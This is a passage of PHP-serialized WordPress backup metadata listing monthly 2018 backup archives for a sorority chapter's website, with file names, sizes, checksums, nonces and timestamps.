checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"09646da0af221dc6f402d686ad03ac958c811ab6\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"ac1ddfb3a9d2503b2e046a78e8dfcc18f52d598c\";s:8:\"uploads1\";s:40:\"1782864f384799760bb15ce9572f3307a2f8d125\";s:7:\"others0\";s:40:\"47c17702278477fe31b70ea6551e1f10402025dd\";s:3:\"db0\";s:40:\"b55d23d5d4a36ad8327afd6e99092d4eb59b7a4c\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"b1a5ff9f17eaf3e0b13a1a068c5d29120a9c8d520dde447b648bb6907ea598e0\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"1cbce9e8d83bbc0850f00f09275b4e618dbd82ede8411454d1a78b367eb74fb7\";s:8:\"uploads1\";s:64:\"80465541908b78539ec7493bcd239307d99c06a628fd8dffc8db0915cb9b5066\";s:7:\"others0\";s:64:\"f28bdf2aa70d3d385187275bbef6f58bd2c90f8d35c1bb16eea216515156be9c\";s:3:\"db0\";s:64:\"faa8d9949882e932a607b51a1f8af6f6816aa0894482e260530c8fd6628b2e3f\";}}s:5:\"nonce\";s:12:\"c37c898058f5\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1548136695;s:6:\"themes\";i:1548136726;s:7:\"uploads\";i:1548136728;s:6:\"others\";i:1548136830;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1545458643;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-plugins.zip\";}s:12:\"plugins-size\";i:49788767;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-uploads.zip\";i:1;s:79:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-uploads2.zip\";}s:12:\"uploads-size\";i:417918262;s:13:\"uploads1-size\";i:48271331;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-db.gz\";s:7:\"db-size\";i:2673484;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"b333f90e4fc01f421f04c50b43363d0c473a3837\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"48f41b2f5f343ad4cc94dc6944f27041fabf1e4d\";s:8:\"uploads1\";s:40:\"60fe08665058cf66a8b155eaadda956897b8bc85\";s:7:\"others0\";s:40:\"47c17702278477fe31b70ea6551e1f10402025dd\";s:3:\"db0\";s:40:\"a99a757ecc1a637529bcfec83faf3a67de743b0d\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"8bb0a04e8c6afbd56071ce9cc2b8b14c195373b95ca9882be5be7af4f8288db7\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"bfabb6e64f1b9ade623429b1e35e12e38fbef463274360ef654a2df46e507f08\";s:8:\"uploads1\";s:64:\"08e0ee852771ebffd93caba71df617630ace7ad300a31eb94adebb856780f0d0\";s:7:\"others0\";s:64:\"f28bdf2aa70d3d385187275bbef6f58bd2c90f8d35c1bb16eea216515156be9c\";s:3:\"db0\";s:64:\"ea9290d6141b7bc80e57c55b58534be1be0ccaad98d700ed216616042db87d6e\";}}s:5:\"nonce\";s:12:\"ccc9f7097728\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1545458643;s:6:\"themes\";i:1545458672;s:7:\"uploads\";i:1545458674;s:6:\"others\";i:1545458732;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1542866622;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-plugins.zip\";}s:12:\"plugins-size\";i:49903244;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-uploads.zip\";i:1;s:79:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-uploads2.zip\";}s:12:\"uploads-size\";i:418361348;s:13:\"uploads1-size\";i:47131251;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-db.gz\";s:7:\"db-size\";i:2596729;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"bfc2c162cf3c3601dc9bafee83079e8bd43e05f8\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"29ed8a1866da94dac20b6ee389be1665bc0f0020\";s:8:\"uploads1\";s:40:\"e971711c4eb324c7169d0d5e8c909d45d9405f18\";s:7:\"others0\";s:40:\"e3ff50f77e3e1ab7d2869a7270853824c4db74ce\";s:3:\"db0\";s:40:\"d1861eabc2814883c477c76d38721edc4d910630\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"f65753ed8bd692c22d95bb1fe96ad8f278673c65d1de6a7b73a4075e0deac72f\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"945f548ac8fed9db0b371f2a6b1239c91162e1429007d299e6807d704339de21\";s:8:\"uploads1\";s:64:\"d2f40a0a5f50901813ac9c1b044af3ac637d47be709a83f4041fd13e0a23bc24\";s:7:\"others0\";s:64:\"d1a00d5174b984d53a56118d2ca533e77d4b7a7eabbe04d98caae2b349e79b1d\";s:3:\"db0\";s:64:\"1a6704a2c98066fa504e685ef9d884bf4a59a1b4bd7587f7cfe783f2ad82e376\";}}s:5:\"nonce\";s:12:\"2e78d4c59616\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1542866622;s:6:\"themes\";i:1542866659;s:7:\"uploads\";i:1542866660;s:6:\"others\";i:1542866728;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1540187430;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-plugins.zip\";}s:12:\"plugins-size\";i:49884362;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-uploads.zip\";i:1;s:79:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-uploads2.zip\";}s:12:\"uploads-size\";i:418798214;s:13:\"uploads1-size\";i:43051848;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-db.gz\";s:7:\"db-size\";i:2616189;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"7ef782cb8f6e328b2fa816131fe0407e47edb454\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"c3f763487c13404b7c102b273d762f6d6d4ee445\";s:8:\"uploads1\";s:40:\"1a422f5cc2add018155eaa46d75ba78bb47dacec\";s:7:\"others0\";s:40:\"cbda2653821d059cd658998b4f584c2164fd3670\";s:3:\"db0\";s:40:\"83ed376090e6fcf714ff4006d10e6fd531b1030f\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"296ca1f85a5ece7bcff4d5f974fcc70c896dfffd618a21590b8ac09caee0e7b2\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"bdd0c66ac09c825370ee842aa19bec77596ff879cb79058507d0414ed29a1051\";s:8:\"uploads1\";s:64:\"eea16b1713413b1c82c5f280234bbf4dc4d8138705e47f3c9cc0896e4a2dd9f1\";s:7:\"others0\";s:64:\"3a830be59a26fbd3da0c15f059be39e9cbd80dc697f4f9bd7c11fbb576a8c71a\";s:3:\"db0\";s:64:\"16d23264e52735355820a5c8b254b224cfbfb3e5e22c29e3f76a32c4f0eaacd0\";}}s:5:\"nonce\";s:12:\"5e2c9677cd19\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1540187430;s:6:\"themes\";i:1540187459;s:7:\"uploads\";i:1540187461;s:6:\"others\";i:1540187521;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1537595568;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-plugins.zip\";}s:12:\"plugins-size\";i:49866165;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-uploads.zip\";i:1;s:79:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-uploads2.zip\";}s:12:\"uploads-size\";i:420675226;s:13:\"uploads1-size\";i:36175668;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-db.gz\";s:7:\"db-size\";i:2749175;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"a67c8ecec8e8ba271f925b98ddb53511b427ba03\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"84f5246a271613768fd95b21da754a0c04fb7751\";s:8:\"uploads1\";s:40:\"7145204b6fdc94a2990bdfdb36fa5e9b81ec0f9f\";s:7:\"others0\";s:40:\"862196ebb348808fa82f1d5726988c685fe6242c\";s:3:\"db0\";s:40:\"75113c9783fc5e143ff42353c1a323690f64a82b\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"e3087880718ee0ccef9ec484d368449328d2c5e34d841bdc6352ca3b1d883ab7\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"572e389b3c9b73abd76b76c2a4578ad75228ee490ecf52a0e6cb901f6f257a5c\";s:8:\"uploads1\";s:64:\"778cce18c4e957435d424f7c25b4002f597be3678210e0b5512c0936557710c9\";s:7:\"others0\";s:64:\"049a3396243acdca212b4008045cc3ded6bb2011cd93fc856d67ab29e5a5889d\";s:3:\"db0\";s:64:\"cc7754ba1dbbab1f08db2d3c4f6db7a61fee781ada037f2e66785232bf9e5346\";}}s:5:\"nonce\";s:12:\"bf7d16eddf3f\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1537595569;s:6:\"themes\";i:1537595602;s:7:\"uploads\";i:1537595603;s:6:\"others\";i:1537595660;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1534918266;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-plugins.zip\";}s:12:\"plugins-size\";i:48377684;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-uploads.zip\";i:1;s:79:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-uploads2.zip\";}s:12:\"uploads-size\";i:420849373;s:13:\"uploads1-size\";i:113037;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-db.gz\";s:7:\"db-size\";i:2813839;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"3ee380c667d71ff9ceb3d26edc15a15d1ccd3937\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"31db5b4a7793b32b12b7297f95b885ceb2b874f7\";s:8:\"uploads1\";s:40:\"fa80b9bca21c5781c21248acbcd312d89a2c2873\";s:7:\"others0\";s:40:\"45c49d4afbb2f01d7be203cc1b9dae6ea7545e31\";s:3:\"db0\";s:40:\"1c20eca599c4b605a6b6041ebe89129f7541943d\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"2f31c896a03d8f85cc2dbd4a70ce8d822d398220a3fcf7f3fa20655d90ecbac5\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"96bb5a189472ac81db380f7baec3b29cfff6dec385f0940a6bbdfff5f4335bfa\";s:8:\"uploads1\";s:64:\"29a1f09f7ad342640c3921b65893972924589db2108ad8f68cdf57f044464405\";s:7:\"others0\";s:64:\"2de23fd0ac2d729fd2c279f4adf13ad3b6e294ed53ca8b7f4239d3a04693642d\";s:3:\"db0\";s:64:\"3372bf299c6986dcea5440054a9f5fb880de019e842b311fb9e62e4172a6e671\";}}s:5:\"nonce\";s:12:\"762d83b6d4e9\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1534918266;s:6:\"themes\";i:1534918307;s:7:\"uploads\";i:1534918311;s:6:\"others\";i:1534918378;}s:18:\"created_by_version\";s:7:\"1.14.12\";s:12:\"is_multisite\";b:0;}i:1532240674;a:17:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-plugins.zip\";}s:12:\"plugins-size\";i:55486286;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-uploads.zip\";i:1;s:79:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-uploads2.zip\";}s:12:\"uploads-size\";i:416324228;s:13:\"uploads1-size\";i:21995950;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-db.gz\";s:7:\"db-size\";i:2731707;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"c4c73421a348d46044d324aaec9e71b401f8fcb9\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"57cea05467ea179ff5296d0e49bfb80470af615b\";s:8:\"uploads1\";s:40:\"2291b9ede45c89eebda013b93fc9f9ae2265d7fd\";s:7:\"others0\";s:40:\"c52252ff0fb068f005e52f0f45d365d12fbfcfe9\";s:3:\"db0\";s:40:\"3e1c00afadf53dcedd12031ce82a46395e749bce\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"88eff75e9fda90f07e318ca8f9e5d671c7d77891892bf22416881969054eca7a\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"b3dbb967d42f6e33f85508d3e7d1802ef43c7fb25a28499f0327701b47578bd1\";s:8:\"uploads1\";s:64:\"4f085bab5e2ff3de4ef29a43c0708e792d145249606695d9dd857b23b3503bdc\";s:7:\"others0\";s:64:\"75f79dfe22f295d769cdfa085a79991e63100cb0caaea1359d9ccdd32fc7e0cc\";s:3:\"db0\";s:64:\"94949cc2a86bd2b1cdbe682aa5144340dfb3cdb67d341f5f9e4f549ad7d334f2\";}}s:5:\"nonce\";s:12:\"36f2abdd31bf\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:7:\"1.14.11\";s:12:\"is_multisite\";b:0;}i:1529648410;a:17:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-plugins.zip\";}s:12:\"plugins-size\";i:55485638;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-uploads.zip\";i:1;s:79:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-uploads2.zip\";}s:12:\"uploads-size\";i:416925648;s:13:\"uploads1-size\";i:21394850;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-db.gz\";s:7:\"db-size\";i:2728926;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"05efb695e9f1254811934ce7a1d738737141117a\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"3f06f0d29eaea439e45fd9db1322224233ad5687\";s:8:\"uploads1\";s:40:\"20dc8f9835490350f838a840e42edc459b2372cf\";s:7:\"others0\";s:40:\"45c49d4afbb2f01d7be203cc1b9dae6ea7545e31\";s:3:\"db0\";s:40:\"3cccefc8d58315a6c4ec8599b49f45c0146b0c67\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"8494ae4cd142774f8604dee7e6e68b314beba13f08a1a0882fe887a8b380087a\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"768a8bc715ac9b95c5cce39183e4202fe6ef1fb9e17fb173654d079eab788708\";s:8:\"uploads1\";s:64:\"86e20762d5b2c2e354e70c95b15544026769db27c1f535a91a4483911d078d03\";s:7:\"others0\";s:64:\"2de23fd0ac2d729fd2c279f4adf13ad3b6e294ed53ca8b7f4239d3a04693642d\";s:3:\"db0\";s:64:\"704cb56cece5bc5487f8161ff4f24a42d04dc350b9fb1bace692723b1aa966aa\";}}s:5:\"nonce\";s:12:\"ba4609141dcc\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:7:\"1.14.11\";s:12:\"is_multisite\";b:0;}i:1526969181;a:17:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-plugins.zip\";}s:12:\"plugins-size\";i:54775268;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-uploads.zip\";i:1;s:79:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-uploads2.zip\";}s:12:\"uploads-size\";i:414999405;s:13:\"uploads1-size\";i:21394850;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-db.gz\";s:7:\"db-size\";i:2248887;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"cc495dadaded4712ee1bbe3f30e07756e991f553\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"1fa01f3c89dac341d25116e48ce749e4200eab53\";s:8:\"uploads1\";s:40:\"22342edb8ff6c725d8a32aa373594bfc16d15125\";s:7:\"others0\";s:40:\"c52252ff0fb068f005e52f0f45d365d12fbfcfe9\";s:3:\"db0\";s:40:\"ea300408565a9e42d027dd74303abac5ffcca307\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"cd73a9dd184e156523d45f4bdf4addba35f48a4f05ee4e8f7a79856e00e7edad\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"4b137ae6457f002d1f2bc48db2faac5ca763aa3728a5748b691ceb3ae5945939\";s:8:\"uploads1\";s:64:\"fdd2dce9d9e7d14905cfa17f12d80c26091c0593098cb02d340851adfd0b5028\";s:7:\"others0\";s:64:\"75f79dfe22f295d769cdfa085a79991e63100cb0caaea1359d9ccdd32fc7e0cc\";s:3:\"db0\";s:64:\"48348a15e3244582fd014425c47caf724a1601708b25eb23ecc20da6b1899a21\";}}s:5:\"nonce\";s:12:\"ec3cca157310\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:6:\"1.14.7\";s:12:\"is_multisite\";b:0;}i:1524376240;a:17:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-plugins.zip\";}s:12:\"plugins-size\";i:52174207;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-uploads.zip\";i:1;s:79:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-uploads2.zip\";}s:12:\"uploads-size\";i:413836860;s:13:\"uploads1-size\";i:4582720;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-others.zip\";}s:11:\"others-size\";i:130776618;s:2:\"db\";s:72:\"backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-db.gz\";s:7:\"db-size\";i:2209443;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"1117b9e4f5abf96ad16e5988311fec0e0e577fb8\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"ab71f6d1cdd72c111a10880295a5554490a5cbd2\";s:8:\"uploads1\";s:40:\"8dbc4f6b92ac9ff632e4c188be8dfbd5da788940\";s:7:\"others0\";s:40:\"a8cdbabe7a4958883fddd988532b189a97100fea\";s:3:\"db0\";s:40:\"f6299e71335e24dc2df386db59a5eac98ac466e2\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"67e1ac044b77867f1cc18543a4666feea7178bc0157f2db927bd27ae5107afc3\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"f7670d573401dbb0f9c2fc7287bd6736cce1d136ac3c82c63d18ac8bfd0263d6\";s:8:\"uploads1\";s:64:\"eaabb680d215b354c3e82e31a0dcdaaf0710ecd31452eb175d09028a150e63e7\";s:7:\"others0\";s:64:\"9cc53992d9781e685cb098587d0a114a6eb001e00f2c7a869c65844b6c3abe48\";s:3:\"db0\";s:64:\"d022ffc74700a06cc51be21dc2f1932e3d96ec4c79e999c2923105728210e5fa\";}}s:5:\"nonce\";s:12:\"fc842d2e31ba\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:6:\"1.14.4\";s:12:\"is_multisite\";b:0;}i:1521699509;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-plugins.zip\";}s:12:\"plugins-size\";i:52153445;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-uploads.zip\";}s:12:\"uploads-size\";i:406962123;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-others.zip\";}s:11:\"others-size\";i:130776618;s:2:\"db\";s:72:\"backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-db.gz\";s:7:\"db-size\";i:2223804;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"dbc1458dd85d0fe589325c298f9570d76ffe1a4a\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"8b7a4451fe899ccc5df1dd08169ee5378632d701\";s:7:\"others0\";s:40:\"e9b3913e41eb3aff330972b5ddbe66b43f21b2eb\";s:3:\"db0\";s:40:\"5ffe197716e7d1e6635696161c725e6257d5f33d\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"8dcc8d25c9dabacfa7b74f6abcf9f01d6a3c12181ecd8ce93a0c7d761d55b576\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"49de195f63cba25a